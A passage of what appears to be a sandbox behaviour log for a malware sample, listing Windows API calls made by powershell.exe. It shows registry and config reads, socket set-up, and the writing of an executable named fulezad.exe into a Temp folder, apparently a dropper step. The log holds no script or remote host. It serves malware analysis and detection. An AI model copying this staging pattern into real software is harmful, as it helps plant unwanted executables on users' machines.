1 [0085.103] setsockopt (s=0x4d0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0085.103] closesocket (s=0x4d0) returned 0 [0085.103] CloseHandle (hObject=0x4d4) returned 1 [0085.103] setsockopt (s=0x4c8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0085.104] closesocket (s=0x4c8) returned 0 [0085.104] CloseHandle (hObject=0x4cc) returned 1 [0085.104] CloseHandle (hObject=0x744) returned 1 [0085.104] CloseHandle (hObject=0x4bc) returned 1 [0085.104] CloseHandle (hObject=0x4c4) returned 1 [0085.105] CloseHandle (hObject=0x460) returned 1 [0085.105] CloseHandle (hObject=0x39c) returned 1 [0085.105] CloseHandle (hObject=0x398) returned 1 [0085.105] CloseHandle (hObject=0x344) returned 1 [0085.106] CloseHandle (hObject=0x340) returned 1 [0085.106] CloseHandle (hObject=0x33c) returned 1 [0085.106] CloseHandle (hObject=0x338) returned 1 [0085.106] CloseHandle (hObject=0x334) returned 1 [0085.106] CloseHandle (hObject=0x330) returned 1 [0085.106] CloseHandle (hObject=0x320) returned 1 [0085.107] CloseHandle (hObject=0x308) returned 1 [0085.107] CloseHandle (hObject=0x304) returned 1 [0085.107] CloseHandle (hObject=0x394) returned 1 [0085.107] CloseHandle (hObject=0x390) returned 1 [0085.108] CloseHandle (hObject=0x45c) returned 1 [0085.108] CloseHandle (hObject=0x458) returned 1 [0085.108] CloseHandle (hObject=0x454) returned 1 [0085.108] RegCloseKey (hKey=0x450) returned 0x0 [0085.108] CloseHandle (hObject=0x44c) returned 1 [0085.109] RegCloseKey (hKey=0x448) returned 0x0 [0085.109] CloseHandle (hObject=0x444) returned 1 [0085.109] RegCloseKey (hKey=0x440) returned 0x0 [0085.109] RegCloseKey (hKey=0x43c) returned 0x0 [0085.109] CloseHandle (hObject=0x424) returned 1 [0085.110] setsockopt (s=0x41c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0085.110] closesocket (s=0x41c) returned 0 [0085.110] CloseHandle (hObject=0x420) returned 1 [0085.110] setsockopt (s=0x410, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0085.110] closesocket (s=0x410) returned 0 [0085.111] CloseHandle (hObject=0x418) returned 1 [0085.111] CloseHandle (hObject=0x77c) returned 1 [0085.111] CloseHandle (hObject=0x780) returned 1 [0085.111] CloseHandle (hObject=0x6b8) returned 1 [0085.111] CloseHandle (hObject=0x7a8) returned 1 [0085.112] CloseHandle (hObject=0x328) returned 1 [0085.112] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0085.112] CloseHandle (hObject=0x2ec) returned 1 [0085.112] CloseHandle (hObject=0x31c) returned 1 [0085.112] UnmapViewOfFile (lpBaseAddress=0x28d0000) returned 1 Thread: id = 35 os_tid = 0xb48 [0066.614] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0066.618] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409 [0066.623] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.624] CoTaskMemFree (pv=0x1b96d620) [0066.625] VirtualQuery (in: lpAddress=0x1c8ed700, lpBuffer=0x1c8ee5c0, dwLength=0x30 | out: lpBuffer=0x1c8ee5c0*(BaseAddress=0x1c8ed000, AllocationBase=0x1bf60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0066.633] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.633] CoTaskMemFree (pv=0x1b96d620) [0066.635] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.635] CoTaskMemFree (pv=0x1b96d620) [0066.637] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.637] CoTaskMemFree (pv=0x1b96d620) [0066.651] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.651] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.651] CoTaskMemFree (pv=0x1b96d620) [0066.797] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.797] CoTaskMemFree (pv=0x1b96d620) [0066.798] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0066.798] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0066.798] CoTaskMemFree (pv=0x1b96d620) [0067.061] VirtualQuery (in: lpAddress=0x1c8ed9b0, lpBuffer=0x1c8ee870, dwLength=0x30 | out: lpBuffer=0x1c8ee870*(BaseAddress=0x1c8ed000, AllocationBase=0x1bf60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.061] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.062] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.062] CoTaskMemFree (pv=0x1b96d620) [0067.064] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.064] CoTaskMemFree (pv=0x1b96d620) [0067.064] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.064] CoTaskMemFree (pv=0x1b96d620) [0067.065] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.065] CoTaskMemFree (pv=0x1b96d620) [0067.101] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.101] CoTaskMemFree (pv=0x1b96d620) [0067.735] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.735] CoTaskMemFree (pv=0x1b96d620) [0067.737] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.737] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.737] CoTaskMemFree (pv=0x1b96d620) [0067.738] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.738] CoTaskMemFree (pv=0x1b96d620) [0067.888] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.888] CoTaskMemFree (pv=0x1b96d620) [0067.889] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.889] CoTaskMemFree (pv=0x1b96d620) [0067.890] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.890] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.890] CoTaskMemFree (pv=0x1b96d620) [0067.892] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0067.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0067.892] CoTaskMemFree (pv=0x1b96d620) [0068.131] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0068.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.131] CoTaskMemFree (pv=0x1b96d620) [0068.200] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0068.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.200] CoTaskMemFree (pv=0x1b96d620) [0068.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.362] CoTaskMemFree (pv=0x1b96d620) [0068.448] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x36c [0068.448] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a0 [0068.464] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c8eb468 | out: phkResult=0x1c8eb468*=0x350) returned 0x0 [0068.465] RegQueryValueExW (in: hKey=0x350, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c8eb3ec, lpData=0x0, lpcbData=0x1c8eb3e8*=0x0 | out: lpType=0x1c8eb3ec*=0x1, lpData=0x0, lpcbData=0x1c8eb3e8*=0xe) returned 0x0 [0068.465] CoTaskMemAlloc (cb=0x12) returned 0x1b99e700 [0068.465] RegQueryValueExW (in: hKey=0x350, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c8eb3bc, lpData=0x1b99e700, lpcbData=0x1c8eb3b8*=0xe | out: lpType=0x1c8eb3bc*=0x1, lpData="Client", lpcbData=0x1c8eb3b8*=0xe) returned 0x0 [0068.465] CoTaskMemFree (pv=0x1b99e700) [0068.465] RegCloseKey (hKey=0x350) returned 0x0 [0068.473] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0068.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.473] CoTaskMemFree (pv=0x1b96d620) [0068.628] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0068.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="") returned 0x0 [0068.628] CoTaskMemFree (pv=0x1b96d620) [0068.630] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0068.630] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0068.630] CoTaskMemFree (pv=0x1b96d620) [0068.647] CoTaskMemAlloc (cb=0x104) returned 0x1b96d620 [0068.647] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x1b96d620, nSize=0x80 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24 [0068.647] CoTaskMemFree (pv=0x1b96d620) [0069.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8ec8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0069.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8ec7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0069.320] CoTaskMemAlloc (cb=0x20c) returned 0x1b969140 [0069.320] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b969140, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0069.320] CoTaskMemFree (pv=0x1b969140) [0069.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8ec910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0069.340] GetCurrentProcess () returned 0xffffffffffffffff [0069.340] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec878 | out: TokenHandle=0x1c8ec878*=0x354) returned 1 [0069.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c8ec4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30 [0069.344] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c8ec920 | out: lpFileInformation=0x1c8ec920*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0069.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c8ec470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0069.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c8ec8d0 | out: lpFileInformation=0x1c8ec8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1 [0069.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c8ec2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0069.346] SetErrorMode (uMode=0x1) returned 0x1 [0069.346] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x374 [0069.346] GetFileType (hFile=0x374) returned 0x1 [0069.346] SetErrorMode (uMode=0x1) returned 0x1 [0069.346] GetFileType (hFile=0x374) returned 0x1 [0069.347] GetFileSize (in: hFile=0x374, lpFileSizeHigh=0x1c8ec8c8 | out: lpFileSizeHigh=0x1c8ec8c8*=0x0) returned 0x65b3 [0069.347] ReadFile (in: hFile=0x374, lpBuffer=0x30c1e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8ec7e8, lpOverlapped=0x0 | out: lpBuffer=0x30c1e38*, lpNumberOfBytesRead=0x1c8ec7e8*=0x1000, lpOverlapped=0x0) returned 1 [0069.361] ReadFile (in: hFile=0x374, lpBuffer=0x30c1e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8ec4c8, lpOverlapped=0x0 | out: lpBuffer=0x30c1e38*, lpNumberOfBytesRead=0x1c8ec4c8*=0x1000, lpOverlapped=0x0) returned 1 [0069.362] ReadFile (in: hFile=0x374, lpBuffer=0x30c1e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8ec318, lpOverlapped=0x0 | out: lpBuffer=0x30c1e38*, lpNumberOfBytesRead=0x1c8ec318*=0x1000, lpOverlapped=0x0) returned 1 [0069.362] ReadFile (in: hFile=0x374, lpBuffer=0x30c1e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8ec318, lpOverlapped=0x0 | out: lpBuffer=0x30c1e38*, lpNumberOfBytesRead=0x1c8ec318*=0x1000, lpOverlapped=0x0) returned 1 [0069.362] ReadFile (in: hFile=0x374, lpBuffer=0x30c1e38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c8ec318, lpOverlapped=0x0 | out: lpBuffer=0x30c1e38*, lpNumberOfBytesRead=0x1c8ec318*=0x1000, lpOverlapped=0x0) returned 1 [0069.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8ec8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0069.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8ec7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0069.366] CoTaskMemAlloc (cb=0x20c) returned 0x1b969140 [0069.366] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b969140, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0069.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8ec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0069.367] GetCurrentProcess () returned 0xffffffffffffffff [0069.367] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ecad8 | out: TokenHandle=0x1c8ecad8*=0x374) returned 1 [0069.367] GetCurrentProcess () returned 0xffffffffffffffff [0069.367] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ecad8 | out: TokenHandle=0x1c8ecad8*=0x350) returned 1 [0069.368] GetCurrentProcess () returned 0xffffffffffffffff [0069.368] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec878 | out: TokenHandle=0x1c8ec878*=0x378) returned 1 [0069.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8ec470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c [0069.369] GetCurrentProcess () returned 0xffffffffffffffff [0069.369] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ecad8 | out: TokenHandle=0x1c8ecad8*=0x37c) returned 1 [0069.370] GetCurrentProcess () returned 0xffffffffffffffff [0069.370] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ecad8 | out: TokenHandle=0x1c8ecad8*=0x380) returned 1 [0069.379] GetCurrentProcess () returned 0xffffffffffffffff [0069.379] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec758 | out: TokenHandle=0x1c8ec758*=0x384) returned 1 [0069.390] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec758 | out: TokenHandle=0x1c8ec758*=0x388) returned 1 [0069.396] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", nBufferLength=0x105, lpBuffer=0x1c8ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", lpFilePart=0x0) returned 0x30 [0069.396] SetErrorMode (uMode=0x1) returned 0x1 [0069.397] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0069.397] GetFileType (hFile=0x3a4) returned 0x1 [0069.397] SetErrorMode (uMode=0x1) returned 0x1 [0069.397] GetFileType (hFile=0x3a4) returned 0x1 [0069.404] GetCurrentProcess () returned 0xffffffffffffffff [0069.405] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec7b8 | out: TokenHandle=0x1c8ec7b8*=0x38c) returned 1 [0069.407] GetCurrentProcess () returned 0xffffffffffffffff [0069.407] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec7b8 | out: TokenHandle=0x1c8ec7b8*=0x3ac) returned 1 [0069.413] GetCurrentProcess () returned 0xffffffffffffffff [0069.413] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec6f8 | out: TokenHandle=0x1c8ec6f8*=0x3b0) returned 1 [0069.414] GetCurrentProcess () returned 0xffffffffffffffff [0069.414] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec6f8 | out: TokenHandle=0x1c8ec6f8*=0x3b4) returned 1 [0069.417] GetCurrentProcess () returned 0xffffffffffffffff [0069.417] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ecd38 | out: TokenHandle=0x1c8ecd38*=0x3b8) returned 1 [0069.424] CoTaskMemAlloc (cb=0xcd0) returned 0x1b9a3d60 [0069.425] RasEnumConnectionsW (in: param_1=0x1b9a3d60, param_2=0x1c8ecd8c, param_3=0x1c8ecd88 | out: param_1=0x1b9a3d60, param_2=0x1c8ecd8c, param_3=0x1c8ecd88) returned 0x0 [0069.429] CoTaskMemFree (pv=0x1b9a3d60) [0069.437] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c8ecb98 | out: lpWSAData=0x1c8ecb98) returned 0 [0069.443] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408 [0069.447] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0069.447] closesocket (s=0x408) returned 0 [0069.447] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x408 [0069.448] setsockopt (s=0x408, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0069.448] closesocket (s=0x408) returned 0 [0069.453] GetCurrentProcess () returned 0xffffffffffffffff [0069.453] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec418 | out: TokenHandle=0x1c8ec418*=0x408) returned 1 [0069.457] GetCurrentProcess () returned 0xffffffffffffffff [0069.457] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8ec418 | out: TokenHandle=0x1c8ec418*=0x40c) returned 1 [0069.465] GetCurrentProcessId () returned 0xac8 [0069.470] CoTaskMemAlloc (cb=0x204) returned 0xe6810 [0069.470] GetComputerNameW (in: lpBuffer=0xe6810, nSize=0x30f0130 | out: lpBuffer="YKYD69Q", nSize=0x30f0130) returned 1 [0069.474] RegQueryValueExW (in: hKey=0x410, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c8ec880, lpData=0x1c8ec87c, lpcbData=0x1c8ec878*=0x4 | out: lpType=0x1c8ec880*=0x4, lpData=0x1c8ec87c*=0x1, lpcbData=0x1c8ec878*=0x4) returned 0x0 [0069.474] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c8ec87c, lpData=0x0, lpcbData=0x1c8ec878*=0x0 | out: lpType=0x1c8ec87c*=0x4, lpData=0x0, lpcbData=0x1c8ec878*=0x4) returned 0x0 [0069.474] RegQueryValueExW (in: hKey=0x410, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c8ec880, lpData=0x1c8ec87c, lpcbData=0x1c8ec878*=0x4 | out: lpType=0x1c8ec880*=0x4, lpData=0x1c8ec87c*=0x137a, lpcbData=0x1c8ec878*=0x4) returned 0x0 [0069.478] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0069.480] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c8ec7f0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x414 [0069.482] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x29d0000 [0069.483] VirtualQuery (in: lpAddress=0x29d0000, lpBuffer=0x1c8ec7e8, dwLength=0x30 | out: lpBuffer=0x1c8ec7e8*(BaseAddress=0x29d0000, AllocationBase=0x29d0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30 [0069.485] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f40a8, cbSid=0x1c8ec7d0 | out: pSid=0x30f40a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec7d0) returned 1 [0069.487] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x1f4) returned 0x0 [0069.487] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f45c8, cbSid=0x1c8ec730 | out: pSid=0x30f45c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec730) returned 1 [0069.488] ReleaseMutex (hMutex=0x418) returned 1 [0069.489] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c8ec740, lpExitTime=0x1c8ec738, lpKernelTime=0x1c8ec730, lpUserTime=0x1c8ec728 | out: lpCreationTime=0x1c8ec740, lpExitTime=0x1c8ec738, lpKernelTime=0x1c8ec730, lpUserTime=0x1c8ec728) returned 1 [0069.489] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f55c8, cbSid=0x1c8ec7d0 | out: pSid=0x30f55c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c8ec7d0) returned 1 [0069.490] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30f63e8, cbSid=0x1c8ec7d0 | out: pSid=0x30f63e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 